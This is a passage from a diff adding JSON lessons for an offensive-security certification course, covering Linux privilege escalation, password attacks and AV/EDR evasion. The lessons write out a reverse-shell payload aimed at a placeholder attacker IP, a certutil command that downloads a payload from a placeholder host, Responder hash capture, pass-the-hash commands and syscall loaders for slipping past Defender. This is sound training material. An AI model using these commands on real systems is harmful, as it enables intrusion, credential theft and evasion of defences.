+      "simplified_explanation": "ROOT MAP keeps Linux escalation organised.",
+      "memory_aids": [
+        "R-Recon, O-Operate, O-Own, T-Traverse, M-Mine, A-Assess, P-Pivot"
+      ],
+      "real_world_connection": "",
+      "reflection_prompt": "Which ROOT MAP stage requires the most practice in your labs?",
+      "is_interactive": false,
+      "xp_reward": 0
+    },
+    {
+      "block_id": "1015018d-10f7-4d4a-9a5f-90ce14b96cf6",
+      "type": "diagram",
+      "title": "Linux Escalation Flow",
+      "content": {
+        "text": "```\nFoothold\n  |\n  +--> id / uname / sudo -l\n  |\n  +--> LinPEAS summary\n  |\n  +--> SUID / Capabilities --> Root shell?\n  |\n  +--> Cron / systemd scripts --> Inject payload\n  |\n  +--> Credentials (shadow, backups) --> su / ssh\n  |\n  +--> Kernel exploit (as last resort)\n  |\n  +--> Containers --> Host escape\n```"
+      },
+      "simplified_explanation": "Follow the flow from recon to containers, using kernel exploits last.",
+      "memory_aids": [
+        "Escalate systematically to reduce noise."
+      ],
+      "real_world_connection": "",
+      "reflection_prompt": "Where in this flow would you insert automated note generation?",
+      "is_interactive": false,
+      "xp_reward": 0
+    },
+    {
+      "block_id": "6e41b248-98b2-4c53-b05c-9ef1dd4270dc",
+      "type": "mindset_coach",
+      "title": "Stay Patient",
+      "content": {
+        "text": "Linux escalation rewards patience. When LinPEAS dumps 2,000 lines, breathe, chunk the output, and prioritise by impact. You are not racing scripts; you are demonstrating judgment. Break problems into ROOT MAP stages and trust the process."
+      },
+      "simplified_explanation": "Chunk enumeration results and trust your methodology.",
+      "memory_aids": [
+        "Chunk, prioritise, act."
+      ],
+      "real_world_connection": "High-performing OSCP candidates spend more time organising output than running exploits.",
+      "reflection_prompt": "What cue will remind you to pause and regroup when enumeration feels overwhelming?",
+      "is_interactive": false,
+      "xp_reward": 0
+    },
+    {
+      "block_id": "2d850763-d491-4960-83d4-deca02bf664d",
+      "type": "reflection",
+      "title": "Linux Escalation Retrospective",
+      "content": {
+        "text": "After your next lab session answer:\n\n- Which SUID or capability vectors did you test and what was the outcome?\n- Did you inspect cron, systemd, and containers thoroughly or skip due to time?\n- How did you document kernel exploit considerations and why you accepted or rejected them?\n- Which credentials did you harvest and how will you reuse them responsibly?\n- What remediation advice would you deliver to the system owner?\n\nTurn these notes into report-ready bullet points."
+      },
+      "simplified_explanation": "Review SUID, cron, kernel, credentials, and remediation after each lab.",
+      "memory_aids": [],
+      "real_world_connection": "",
+      "reflection_prompt": "Which question exposed a blind spot you need to address?",
+      "is_interactive": false,
+      "xp_reward": 0
+    }
+  ],
+  "post_assessment": [
+    {
+      "question": "Which command reveals Linux capabilities assigned to binaries and helps identify cap_setuid abuse paths?",
+      "options": [
+        "find / -perm -2000",
+        "getcap -r / 2>/dev/null",
+        "lsattr -a",
+        "ldd --cap"
+      ],
+      "correct_answer": 1,
+      "explanation": "getcap recursively lists capabilities so you can spot dangerous assignments such as cap_setuid+ep.",
+      "question_id": "34ecd7a8-6781-441b-bcb3-30cdbabfa064",
+      "type": "multiple_choice",
+      "difficulty": 3
+    },
+    {
+      "question": "During assessment you discover a root cron job executing /usr/local/bin/backup.sh every minute. The file is writable by your user. What is the safest escalation workflow?",
+      "options": [
+        "Delete the cron job and create a new one pointing to your payload",
+        "Append your payload to backup.sh while preserving original functionality, wait for execution, then revert",
+        "Restart the cron service to force immediate execution without modifying the script",
+        "Replace /bin/bash with your payload temporarily"
+      ],
+      "correct_answer": 1,
+      "explanation": "Modifying the script while maintaining functionality respects stability and yields root when cron runs it, allowing cleanup afterward.",
+      "question_id": "e22bda91-6996-4c56-a96b-53b4ab84162c",
+      "type": "multiple_choice",
+      "difficulty": 3
+    },
+    {
+      "question": "When should kernel exploits be attempted during OSCP-style privilege escalation?",
+      "options": [
+        "Immediately after obtaining a shell",
+        "Only after safer misconfigurations and credential paths are exhausted and kernel version is confirmed vulnerable",
+        "Whenever LinPEAS suggests any CVE",
+        "Never, because OSCP forbids kernel exploits"
+      ],
+      "correct_answer": 1,
+      "explanation": "Kernel exploits are a last resort after validating safer vectors and ensuring the target kernel matches a known vulnerable build.",
+      "question_id": "5d3ee8bb-9352-474a-8430-991483c8f79d",
+      "type": "multiple_choice",
+      "difficulty": 3
+    }
+  ]
+}

--- a/content/lesson_pentest_27_password_attacks_credential_operations_RICH.json
+++ b/content/lesson_pentest_27_password_attacks_credential_operations_RICH.json
@@ -1,0 +1,271 @@
+{
+  "lesson_id": "4c282594-95a4-49cf-b69c-bdd8f0ba8373",
+  "domain": "pentest",
+  "title": "Password Attacks and Credential Operations",
+  "subtitle": "Harvesting, cracking, and replaying credentials in PWK scenarios",
+  "difficulty": 2,
+  "estimated_time": 70,
+  "order_index": 27,
+  "author": "CyberLearn Offensive Curriculum Team",
+  "base_xp_reward": 180,
+  "mastery_threshold": 78,
+  "is_core_concept": true,
+  "created_at": "2025-01-20T12:00:00",
+  "updated_at": "2025-01-20T12:00:00",
+  "version": "1.0",
+  "prerequisites": [
+    "Passive OSINT Target Profiling",
+    "Service Enumeration Playbooks"
+  ],
+  "concepts": [
+    "Credential collection",
+    "Password cracking workflows",
+    "Wordlist generation",
+    "Pass-the-hash and pass-the-ticket",
+    "Offline hash extraction",
+    "Password spraying",
+    "Credential reuse detection",
+    "OPSEC for password attacks"
+  ],
+  "learning_objectives": [
+    "Collect password material from network captures, services, and OS artifacts",
+    "Design cracking strategies with tailored wordlists and rules",
+    "Execute online attacks responsibly while avoiding account lockouts",
+    "Replay hashes and tickets to pivot without cracking when possible",
+    "Document remediation recommendations that strengthen credential hygiene"
+  ],
+  "jim_kwik_principles": [
+    "Active recall",
+    "Spaced repetition"
+  ],
+  "content_blocks": [
+    {
+      "block_id": "f5bd4267-9f4c-42ed-8120-27a50e31f15a",
+      "type": "explanation",
+      "title": "Credential Operations Overview",
+      "content": {
+        "text": "# Why Credentials Matter\n\nEvery PWK machine hides passwords or hashes that unlock further access. Effective pentesters treat credentials as an intelligence discipline: collect, process, exploit, and report. This lesson guides you through the full lifecycle from discovery to reporting without triggering alarms.\n\n## Objectives\n\n- Identify credential sources on Windows and Linux hosts.\n- Plan cracking sessions using Hashcat and John the Ripper.\n- Apply online techniques such as password spraying, RDP brute force, and Kerberos pre-auth capture carefully.\n- Reuse credentials with pass-the-hash and Kerberos delegation abuse.\n\nKeep a credential notebook with fields for source, format, cracking status, and pivot impact. The OSCP exam rewards structured reporting of every credential you weaponise."
+      },
+      "simplified_explanation": "Treat credentials like intelligence: collect, crack, replay, and document.",
+      "memory_aids": [
+        "Collect \u2192 Crack \u2192 Reuse"
+      ],
+      "real_world_connection": "Many breaches start with a single reused password; defenders scrutinise credential hygiene reports.",
+      "reflection_prompt": "How are you currently tracking credentials between lab machines?",
+      "is_interactive": false,
+      "xp_reward": 0
+    },
+    {
+      "block_id": "a0b3f3b3-fc9d-4e17-b66c-eb4e327cc33d",
+      "type": "explanation",
+      "title": "Discovery Techniques",
+      "content": {
+        "text": "# Offline Sources\n\n- Windows SAM and SYSTEM hives: Use reg.exe or secretsdump.py once you have SYSTEM.\n- Linux /etc/shadow and SSH keys: copy carefully, maintain permissions for stealth.\n- Database connection strings: search configuration files (`grep -R \"password\" /var/www`).\n- Memory dumps: utilise procdump or comsvcs.dll MiniDumpW for lsass on Windows (respect OSCP tooling policies).\n\n## Network Capture\n\n- Responder and Inveigh to coerce NTLMv1/v2 challenges (allowed in PWK labs when rules permit).\n- Tcpdump or Wireshark to capture credentials sent in cleartext (FTP, Telnet).\n- Kerberos AS-REP roasting with impacket-GetNPUsers for users without pre-authentication.\n\n## OSINT Feeders\n\n- Corporate breach dumps from Have I Been Pwned, DeHashed.\n- Employee naming conventions to build custom wordlists.\n\nDocument timestamps, hostnames, and accounts to avoid duplication."
+      },
+      "simplified_explanation": "Harvest credentials from system files, memory, network captures, and OSINT.",
+      "memory_aids": [
+        "Host + Network + OSINT"
+      ],
+      "real_world_connection": "Real-world phishing engagements reuse OSINT wordlists to guess VPN passwords.",
+      "reflection_prompt": "Which discovery source feels weakest in your workflow?",
+      "is_interactive": false,
+      "xp_reward": 0
+    },
+    {
+      "block_id": "2055273b-6fec-429b-b61a-a5205493129f",
+      "type": "explanation",
+      "title": "Cracking Strategy",
+      "content": {
+        "text": "# Hash Identification\n\nDetect hash formats using `hashid` or `hashcat --example-hashes`. For PWK you will commonly see:\n- NTLM (Windows)\n- MD5 / SHA1 (legacy web apps)\n- bcrypt (modern apps)\n- Kerberos etype 23 (AS-REP roast)\n\n## Wordlists and Rules\n\n- Start with `rockyou.txt`, but enrich with `cewl` output from target websites.\n- Use `hashcat -r` with rules like `best64.rule` to mutate base words.\n- Create targeted masks: `?u?l?l?l?l?d?d` for patterns like Winter23.\n\n## Distributed Cracking\n\n- For large sets, split tasks across GPU rigs or use Hashtopolis.\n- Monitor progress, adjust strategies when hit rate drops.\n\nAlways note cracking parameters to justify findings in your report."
+      },
+      "simplified_explanation": "Identify hash types, choose wordlists, apply rules, and log cracking settings.",
+      "memory_aids": [
+        "Format \u2192 Wordlist \u2192 Rule \u2192 Mask"
+      ],
+      "real_world_connection": "OSCP graders appreciate when you reference specific rules in your notes.",
+      "reflection_prompt": "How quickly can you pivot from hash discovery to a tuned hashcat command?",
+      "is_interactive": false,
+      "xp_reward": 0
+    },
+    {
+      "block_id": "91a103ae-b83b-4ad2-8997-dd94091c4a2d",
+      "type": "explanation",
+      "title": "Online Attacks and OPSEC",
+      "content": {
+        "text": "# Password Spraying\n\nLimit attempts to avoid lockouts:\n- For AD: target a subset of users with one password per 30 minutes.\n- Use `crackmapexec` or `kerbrute` with throttle options.\n\n## Brute Force Considerations\n\n- Services like SSH, FTP, and RDP often enforce lockouts after 5 attempts. Track counters per user.\n- Use proxies or pivot hosts to distribute attempts, but monitor for account lock messages.\n\n## Kerberos and NTLM Replay\n\n- Pass-the-hash via `wmiexec.py -hashes` or `pth-winexe` when LM/NTLM available.\n- Pass-the-ticket by exporting Kerberos tickets with Mimikatz (`kerberos::ptt`).\n- Remote Desktop using `xfreerdp /pth` for NTLM hashes.\n\nMaintain audit logs noting attempts, results, and OPSEC precautions."
+      },
+      "simplified_explanation": "Throttle online attacks, use pass-the-hash/ticket when possible, and log your actions.",
+      "memory_aids": [
+        "Spray slow, replay fast"
+      ],
+      "real_world_connection": "During 2023 assessments, careless spraying caused lockouts and failed engagements.",
+      "reflection_prompt": "What guardrails will you enforce before launching a password spray?",
+      "is_interactive": false,
+      "xp_reward": 0
+    },
+    {
+      "block_id": "f42a1fa6-8200-4883-bad4-b74f697f0512",
+      "type": "code_exercise",
+      "title": "Hashcat Workflow",
+      "content": {
+        "text": "Practise cracking NTLM hashes using Hashcat:\n\n1. Create a file `ntlm.hash` containing `aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c`.\n2. Run `hashcat -m 1000 -a 0 ntlm.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --show`.\n3. Record cracked password `password1` and note runtime.\n4. Modify the list with a custom entry `Winter2025!` and re-run to simulate targeted cracking.\n\nCapture command, rule, and outcome in your lab journal."
+      },
+      "simplified_explanation": "Run hashcat with rockyou and rules to crack NTLM hashes.",
+      "memory_aids": [],
+      "real_world_connection": "Hashcat mastery shortens OSCP exam time dramatically.",
+      "reflection_prompt": "Which parameters will you tweak first when a hash resists cracking?",
+      "is_interactive": false,
+      "xp_reward": 0
+    },
+    {
+      "block_id": "6874f7bc-e06a-440e-a453-14242f23cb43",
+      "type": "code_exercise",
+      "title": "Responder Capture Lab",
+      "content": {
+        "text": "Build muscle memory for coercing NTLM hashes:\n\n1. In PWK-style lab, launch Responder: `sudo responder -I tun0 -wrf`.\n2. Trigger authentication by browsing to `\\\\attacker\\share` from a victim machine or using `Invoke-Command` to map the share.\n3. Observe captured hashes in `/usr/share/responder/logs/`. Identify username, challenge, and hash.\n4. Use `hashcat -m 5600` to crack the captured NTLMv2 hash with a targeted wordlist.\n\nRemember to disable Responder after capture to avoid interfering with legitimate traffic."
+      },
+      "simplified_explanation": "Run Responder, coerce authentication, crack captured NTLM hashes.",
+      "memory_aids": [],
+      "real_world_connection": "Responder remains a staple in PWK labs and real engagements.",
+      "reflection_prompt": "How will you avoid disrupting network services when running Responder?",
+      "is_interactive": false,
+      "xp_reward": 0
+    },
+    {
+      "block_id": "2ed26f91-48d0-4530-8088-2a036a424578",
+      "type": "code_exercise",
+      "title": "Pass-the-Hash Execution",
+      "content": {
+        "text": "Practise reusing NTLM hashes without cracking:\n\n```bash\nimpacket-psexec Administrator@10.10.11.5 -hashes ::8846f7eaee8fb117ad06bdd830b7586c\n```\n\n- Replace IP and hash with lab values.\n- If SMB signing blocks you, switch to `wmiexec.py` or `smbexec.py`.\n- Document differences in artifacts (event logs, process names).\n\nExtend exercise by using `xfreerdp /u:Administrator /pth:8846f7eaee8fb117ad06bdd830b7586c /v:10.10.11.5` to obtain RDP access."
+      },
+      "simplified_explanation": "Reuse NTLM hashes directly via Impacket tools and RDP.",
+      "memory_aids": [],
+      "real_world_connection": "Pass-the-hash often unlocks domain admin without cracking.",
+      "reflection_prompt": "What defender logs would reveal your pass-the-hash activity?",
+      "is_interactive": false,
+      "xp_reward": 0
+    },
+    {
+      "block_id": "edcff1fa-b4c5-4a47-b077-9ff08e4449c4",
+      "type": "real_world",
+      "title": "Case Study: Password Reuse Breach",
+      "content": {
+        "text": "In 2023, a healthcare provider suffered a breach when attackers reused an employee's leaked LinkedIn password to access VPN. Multi-factor authentication was offline during maintenance, so the attackers pivoted to internal Citrix and dumped LSASS memory to harvest dozens of credentials. Incident responders highlighted the lack of password rotation and monitoring of VPN logs.\n\n**Lesson:** Password reuse plus missing MFA equals rapid compromise. Your reports must emphasise layered defences."
+      },
+      "simplified_explanation": "Password reuse without MFA enabled a major breach.",
+      "memory_aids": [
+        "Reuse + no MFA = breach"
+      ],
+      "real_world_connection": "",
+      "reflection_prompt": "How will you articulate the risk of password reuse to executive stakeholders?",
+      "is_interactive": false,
+      "xp_reward": 0
+    },
+    {
+      "block_id": "5f156691-08f1-4d8a-aac3-52fa9e79a1b0",
+      "type": "memory_aid",
+      "title": "Mnemonic: CRAFT",
+      "content": {
+        "text": "Remember CRAFT for credential operations:\n\n- **C**ollect from hosts, network, OSINT\n- **R**ecord source and format immediately\n- **A**ttack via cracking or online spraying\n- **F**orge replays (pass-the-hash/ticket)\n- **T**each defenders by documenting remediation\n\nReview CRAFT before each password-focused session."
+      },
+      "simplified_explanation": "CRAFT keeps credential workflows organised.",
+      "memory_aids": [
+        "Collect, Record, Attack, Forge, Teach"
+      ],
+      "real_world_connection": "",
+      "reflection_prompt": "Which stage of CRAFT is easiest for you to neglect under time pressure?",
+      "is_interactive": false,
+      "xp_reward": 0
+    },
+    {
+      "block_id": "761bccb0-3eaa-43cc-84ef-d621bc178b8f",
+      "type": "diagram",
+      "title": "Credential Pipeline",
+      "content": {
+        "text": "```\nDiscovery --> Normalize --> Crack/Replay --> Pivot --> Report\n    |            |            |             |        |\n  OSINT      Hash ID     Hashcat rules   Pass-the-hash  Remediation\n  Host logs  Format      Mask attacks    Kerberos PTT   MFA rollout\n  Network    Notebook    GPU rigs        RDP / WinRM    Password policy\n```"
+      },
+      "simplified_explanation": "Visualise the flow from discovery to reporting.",
+      "memory_aids": [
+        "Pipeline ensures no credential is wasted."
+      ],
+      "real_world_connection": "",
+      "reflection_prompt": "Where in this pipeline do you lose the most time today?",
+      "is_interactive": false,
+      "xp_reward": 0
+    },
+    {
+      "block_id": "62fc4b1a-0854-44af-bffd-993a04863b68",
+      "type": "mindset_coach",
+      "title": "Stay Ethical",
+      "content": {
+        "text": "Credential handling demands discipline. Every hash represents real trust. Treat captured credentials respectfully, limit storage, and label notes with destruction reminders. Ethical hackers build credibility by proving they can handle secrets responsibly."
+      },
+      "simplified_explanation": "Handle credentials with respect and clear retention plans.",
+      "memory_aids": [
+        "Stewardship builds trust."
+      ],
+      "real_world_connection": "Clients renew contracts with testers who demonstrate impeccable credential hygiene.",
+      "reflection_prompt": "What is your retention policy for cracked passwords after an engagement?",
+      "is_interactive": false,
+      "xp_reward": 0
+    },
+    {
+      "block_id": "feb8495c-78c5-42a5-9e41-db47e4d437bf",
+      "type": "reflection",
+      "title": "Credential Ops Retro",
+      "content": {
+        "text": "After your next cracking session answer:\n\n- How many unique credentials did you collect and from which sources?\n- Which cracking techniques succeeded and why?\n- Did any online attempts trigger lockouts or alerts?\n- How did you pivot using replays and what artifacts remained?\n- What remediation advice will you include for each compromised account?\n\nConvert these answers into concise report snippets."
+      },
+      "simplified_explanation": "Review sources, cracking, online attempts, pivots, and remediation.",
+      "memory_aids": [],
+      "real_world_connection": "",
+      "reflection_prompt": "Which question revealed a documentation gap in your workflow?",
+      "is_interactive": false,
+      "xp_reward": 0
+    }
+  ],
+  "post_assessment": [
+    {
+      "question": "Which Hashcat mode should you use to crack NTLM hashes collected from a Windows SAM database?",
+      "options": [
+        "-m 0",
+        "-m 5600",
+        "-m 1000",
+        "-m 13100"
+      ],
+      "correct_answer": 2,
+      "explanation": "Mode 1000 targets NTLM hashes extracted from Windows systems.",
+      "question_id": "646e203b-4d87-4509-a8b9-3362f95151f8",
+      "type": "multiple_choice",
+      "difficulty": 2
+    },
+    {
+      "question": "During a password spray you plan to test Winter2025! against 40 Active Directory accounts. What is the safest approach?",
+      "options": [
+        "Attempt the password against all accounts every minute until success",
+        "Spray the password once against a subset of accounts, wait 30 minutes, then proceed",
+        "Use Hydra to run 10 attempts per second across all accounts",
+        "Run Responder simultaneously to increase success"
+      ],
+      "correct_answer": 1,
+      "explanation": "Spacing attempts reduces lockout risk; targeting subsets respects AD account lock policies.",
+      "question_id": "d814aae8-c163-4553-b36f-62e4c9caf657",
+      "type": "multiple_choice",
+      "difficulty": 2
+    },
+    {
+      "question": "Why might you choose pass-the-hash over cracking an NTLM hash?",
+      "options": [
+        "Pass-the-hash reduces the need for network connectivity",
+        "Pass-the-hash allows immediate reuse without GPU cracking time",
+        "Pass-the-hash automatically resets the user password",
+        "Pass-the-hash bypasses antivirus by default"
+      ],
+      "correct_answer": 1,
+      "explanation": "Replaying hashes can grant access instantly without consuming time cracking complex passwords.",
+      "question_id": "5c264acb-3a12-4436-ada1-7cc4219a34fc",
+      "type": "multiple_choice",
+      "difficulty": 2
+    }
+  ]
+}

--- a/content/lesson_pentest_28_antivirus_edr_evasion_techniques_RICH.json
+++ b/content/lesson_pentest_28_antivirus_edr_evasion_techniques_RICH.json
@@ -1,0 +1,271 @@
+{
+  "lesson_id": "5a88cbdf-df4d-4cf7-a690-8b4b83c549e3",
+  "domain": "pentest",
+  "title": "Antivirus and EDR Evasion Techniques",
+  "subtitle": "Practical bypass strategies aligned with PWK ethical limits",
+  "difficulty": 3,
+  "estimated_time": 80,
+  "order_index": 28,
+  "author": "CyberLearn Offensive Curriculum Team",
+  "base_xp_reward": 210,
+  "mastery_threshold": 84,
+  "is_core_concept": true,
+  "created_at": "2025-01-20T12:00:00",
+  "updated_at": "2025-01-20T12:00:00",
+  "version": "1.0",
+  "prerequisites": [
+    "Initial Access Tradecraft",
+    "Payload Development and Execution"
+  ],
+  "concepts": [
+    "Defender telemetry",
+    "Signature and heuristic detection",
+    "Payload obfuscation",
+    "Living-off-the-land binaries",
+    "Process injection techniques",
+    "Command and control profile tuning",
+    "EDR evasion testing",
+    "Reporting on defensive gaps"
+  ],
+  "learning_objectives": [
+    "Explain how modern AV and EDR engines detect offensive activity",
+    "Design payloads that reduce static and behavioral signatures",
+    "Leverage LOLBins and native tools for stealthy execution",
+    "Test evasion hypotheses safely within PWK or lab environments",
+    "Communicate detection gaps and mitigation strategies to defenders"
+  ],
+  "jim_kwik_principles": [
+    "Visualization",
+    "Active learning"
+  ],
+  "content_blocks": [
+    {
+      "block_id": "ba710a4c-0fbf-4416-88a8-6fc2c450a8ca",
+      "type": "explanation",
+      "title": "Understanding Defender Telemetry",
+      "content": {
+        "text": "# How AV and EDR Watch You\n\nAntivirus engines rely on signature databases and heuristic rules. Endpoint Detection and Response (EDR) extends this by monitoring process creation, command-line arguments, DLL loads, network connections, and memory operations. Knowing what data defenders see informs your evasion plan.\n\n## Telemetry Sources\n\n- Windows Event Logs: Sysmon events 1, 3, 7, 10, 11, 13 are common triggers.\n- Kernel callbacks: many EDRs hook NtCreateThreadEx, NtWriteVirtualMemory.\n- Userland API hooking: DLLs inject into processes to intercept Win32 APIs.\n- Cloud analytics: telemetry forwarded to SIEM/SOAR for correlation.\n\n## PWK Perspective\n\nPWK labs run minimal defenses, but the exam expects you to discuss evasion strategies in reports. Practise articulating how your techniques map to telemetry to build credibility."
+      },
+      "simplified_explanation": "EDR watches processes, memory operations, and network traffic; know the telemetry.",
+      "memory_aids": [
+        "Logs + Hooks + Cloud"
+      ],
+      "real_world_connection": "Blue teams rely on Sysmon and kernel callbacks to flag privilege escalation chains.",
+      "reflection_prompt": "Which telemetry source have you spent the most time studying?",
+      "is_interactive": false,
+      "xp_reward": 0
+    },
+    {
+      "block_id": "4bc2ce81-5511-486e-8457-4193a16a208d",
+      "type": "explanation",
+      "title": "Signature and Heuristic Avoidance",
+      "content": {
+        "text": "# Static Detection\n\nSignature engines hash payloads and flag known malicious code. Countermeasures:\n- Recompile or modify shellcode to change byte patterns.\n- Encrypt payloads with unique keys and decrypt in memory.\n- Use shellcode loaders that download payloads on demand.\n\n## Heuristic Detection\n\nBehavioral engines flag suspicious actions:\n- Macro-enabled Office documents launching PowerShell.\n- mshta executing remote scripts.\n- Abnormal parent-child process pairs (e.g., winword spawning cmd).\n\nMitigations include delaying execution, using legitimate parent processes, and mimicking normal command-line arguments."
+      },
+      "simplified_explanation": "Alter payload bytes and behavior to dodge signatures and heuristics.",
+      "memory_aids": [
+        "Modify bytes, mimic behavior"
+      ],
+      "real_world_connection": "OSCP graders expect you to explain why custom-compiled payloads bypass Defender.",
+      "reflection_prompt": "How do you currently test whether a payload triggers heuristic detections?",
+      "is_interactive": false,
+      "xp_reward": 0
+    },
+    {
+      "block_id": "2891e44d-c980-4fc8-95de-52bcc41c0c8c",
+      "type": "explanation",
+      "title": "Living-off-the-Land and Native Tools",
+      "content": {
+        "text": "# LOLBins Overview\n\nLiving-off-the-land binaries (LOLBins) are legitimate executables abused for malicious actions. Examples include:\n- `rundll32` executing DLL exports.\n- `certutil` for downloading and decoding payloads.\n- `msbuild` compiling and running inline C#.\n- `wmic` or `powershell` for remote execution.\n\n## Trade-offs\n\nLOLBins blend into normal activity but still leave telemetry. Some defenders flag unusual command arguments. Combine LOLBins with environment-specific knowledge to maintain stealth.\n\n## Scripted Execution\n\nFor PowerShell, use constrained language mode bypasses (e.g., `powershell -nop -w hidden -enc ...`) carefully. On Linux, leverage bash built-ins, curl, wget, and ssh for stealth."
+      },
+      "simplified_explanation": "Use trusted binaries to execute payloads while blending with normal operations.",
+      "memory_aids": [
+        "LOLBins need context"
+      ],
+      "real_world_connection": "PWK exam write-ups often cite certutil and msbuild for stealth execution.",
+      "reflection_prompt": "Which LOLBins do you rely on, and how do you justify them in reports?",
+      "is_interactive": false,
+      "xp_reward": 0
+    },
+    {
+      "block_id": "62973416-334d-4e5a-9741-6675afcdac4c",
+      "type": "explanation",
+      "title": "Process Injection and Memory Tradecraft",
+      "content": {
+        "text": "# Process Injection Techniques\n\n- **Classic DLL injection**: LoadLibrary into remote process; easily detected.\n- **Reflective DLL injection**: Load DLL from memory without touching disk.\n- **Process hollowing**: Create suspended process, unmap memory, write payload, resume.\n- **APC queueing**: Queue asynchronous procedure calls to run shellcode in target thread.\n\n## Evading Detection\n\n- Use syscalls (e.g., Hell's Gate, SysWhispers) to bypass userland hooks.\n- Randomise API resolution and sleep jitter.\n- Clean up handles and restore original bytes when possible.\n\nRemember: OSCP encourages understanding techniques, but exam machines rarely require complex injection. Focus on lab practice to discuss the concepts intelligently."
+      },
+      "simplified_explanation": "Inject into processes carefully, using syscalls and cleanup to avoid hooks.",
+      "memory_aids": [
+        "Reflect, Hollow, APC"
+      ],
+      "real_world_connection": "Modern EDRs detect CreateRemoteThread spikes; stealth requires syscall-level tradecraft.",
+      "reflection_prompt": "Can you explain the difference between reflective injection and process hollowing without notes?",
+      "is_interactive": false,
+      "xp_reward": 0
+    },
+    {
+      "block_id": "e684d557-74a7-4998-8b73-c494b656faa5",
+      "type": "code_exercise",
+      "title": "Custom msfvenom Payload Recompile",
+      "content": {
+        "text": "Practise generating unique payloads:\n\n1. Generate raw shellcode: `msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f c`.\n2. Wrap shellcode in a custom C template that allocates memory, copies bytes, and spawns a thread via direct syscalls.\n3. Compile with `x86_64-w64-mingw32-gcc -o loader.exe loader.c`.\n4. Scan loader.exe with Windows Defender (on a disposable VM) to verify detection.\n5. Modify encryption key, sleep timers, and API resolution to observe detection changes.\n\nRecord each iteration's hash and detection status."
+      },
+      "simplified_explanation": "Regenerate payloads with custom loaders to evade static signatures.",
+      "memory_aids": [],
+      "real_world_connection": "Custom loaders routinely bypass default Defender settings in PWK labs.",
+      "reflection_prompt": "Which loader modifications had the biggest impact on Defender detection?",
+      "is_interactive": false,
+      "xp_reward": 0
+    },
+    {
+      "block_id": "65ebb28f-3c45-43dc-a9a6-475807a20b1e",
+      "type": "code_exercise",
+      "title": "certutil LOLBin Lab",
+      "content": {
+        "text": "Execute payload delivery with certutil:\n\n```cmd\ncertutil -urlcache -split -f https://ATTACKER/payload.txt C:\\Users\\Public\\payload.txt\ncertutil -decode C:\\Users\\Public\\payload.txt C:\\Users\\Public\\payload.exe\n```\n\n- Host payload in base64 format to avoid basic proxies.\n- After decoding, run payload and observe Defender response.\n- Clean up cache: `certutil -urlcache -split -f http://localhost/ delete`.\n\nDocument network logs, file paths, and Defender alerts."
+      },
+      "simplified_explanation": "Use certutil to download and decode payloads stealthily.",
+      "memory_aids": [],
+      "real_world_connection": "certutil is a common living-off-the-land technique noted in MITRE ATT&CK T1105.",
+      "reflection_prompt": "How would defenders differentiate malicious from legitimate certutil usage?",
+      "is_interactive": false,
+      "xp_reward": 0
+    },
+    {
+      "block_id": "f297ae9d-459c-4028-9a69-8d79f1267691",
+      "type": "code_exercise",
+      "title": "Syscall-based Shellcode Execution",
+      "content": {
+        "text": "Experiment with direct syscalls:\n\n1. Clone a public syscall loader repository (e.g., SysWhispers2) and generate stubs for NtAllocateVirtualMemory, NtWriteVirtualMemory, NtCreateThreadEx.\n2. Embed your shellcode and compile the loader.\n3. Run loader on a test VM with EDR disabled, then enable Defender to observe differences.\n4. Compare telemetry with classic VirtualAlloc/WriteProcessMemory/ResumeThread techniques.\n\nNote the complexity vs. benefit trade-off for exam scenarios."
+      },
+      "simplified_explanation": "Use syscalls to avoid userland API hooks when executing shellcode.",
+      "memory_aids": [],
+      "real_world_connection": "Advanced operators rely on syscalls to evade EDR hooking.",
+      "reflection_prompt": "When would syscall loaders be overkill for a PWK target?",
+      "is_interactive": false,
+      "xp_reward": 0
+    },
+    {
+      "block_id": "9d8b379e-a385-4e2c-b1a2-c58c83de032a",
+      "type": "real_world",
+      "title": "Case Study: EDR Blind Spot",
+      "content": {
+        "text": "A technology company deployed a well-known EDR. Red teamers observed that Office macros spawning msbuild were blocked, but signed installers invoking PowerShell were not. By packaging their payload inside an MSI and using legitimate parameters, they bypassed controls and established persistent C2. The incident report recommended expanding application control policies and monitoring msiexec child processes.\n\n**Insight:** EDR coverage is uneven; understanding business workflows reveals blind spots."
+      },
+      "simplified_explanation": "Legitimate installers can bypass EDR if policies lack context.",
+      "memory_aids": [
+        "Signed installers can be malicious"
+      ],
+      "real_world_connection": "",
+      "reflection_prompt": "How would you test msiexec behavior in your lab without harming production?",
+      "is_interactive": false,
+      "xp_reward": 0
+    },
+    {
+      "block_id": "120d60f8-642e-4705-b0b4-396984a858fa",
+      "type": "memory_aid",
+      "title": "Mnemonic: SHIELD",
+      "content": {
+        "text": "Anchor your evasion workflow with SHIELD:\n\n- **S**tudy telemetry first\n- **H**arden payload bytes\n- **I**mitate normal behavior\n- **E**xecute with LOLBins when possible\n- **L**imit footprint (cleanup)\n- **D**ocument detection gaps for the report\n\nReview SHIELD before launching any evasive payload."
+      },
+      "simplified_explanation": "SHIELD keeps evasion disciplined and report-ready.",
+      "memory_aids": [
+        "Study, Harden, Imitate, Execute, Limit, Document"
+      ],
+      "real_world_connection": "",
+      "reflection_prompt": "Which SHIELD step saves you the most time during engagements?",
+      "is_interactive": false,
+      "xp_reward": 0
+    },
+    {
+      "block_id": "66e4c75a-d61a-4f4d-ae8d-af1431d7d840",
+      "type": "diagram",
+      "title": "Evasion Decision Tree",
+      "content": {
+        "text": "```\nPayload needs execution?\n    |\n    +--> High detection risk --> Recompile + Encrypt --> Test in lab\n    |\n    +--> Needs fileless? --> PowerShell/CLR loader --> Monitor telemetry\n    |\n    +--> Defender flag? --> Switch to LOLBin delivery --> certutil/msbuild\n    |\n    +--> Still detected? --> Syscall loader or alternate C2 profile\n    |\n    +--> Success --> Document + Cleanup\n```"
+      },
+      "simplified_explanation": "Decide whether to recompile, go fileless, or switch techniques based on detections.",
+      "memory_aids": [
+        "Iterate decisions until payload succeeds safely."
+      ],
+      "real_world_connection": "",
+      "reflection_prompt": "Where would you insert automated lab testing in this decision tree?",
+      "is_interactive": false,
+      "xp_reward": 0
+    },
+    {
+      "block_id": "69f4ac27-9c71-425d-82e6-5344c041e626",
+      "type": "mindset_coach",
+      "title": "Ethical Constraints",
+      "content": {
+        "text": "Evasion skills come with responsibility. In PWK and client networks, stay within agreed rules of engagement. Never disable production defenses without permission. Your credibility depends on balancing offensive creativity with respect for defensive teams."
+      },
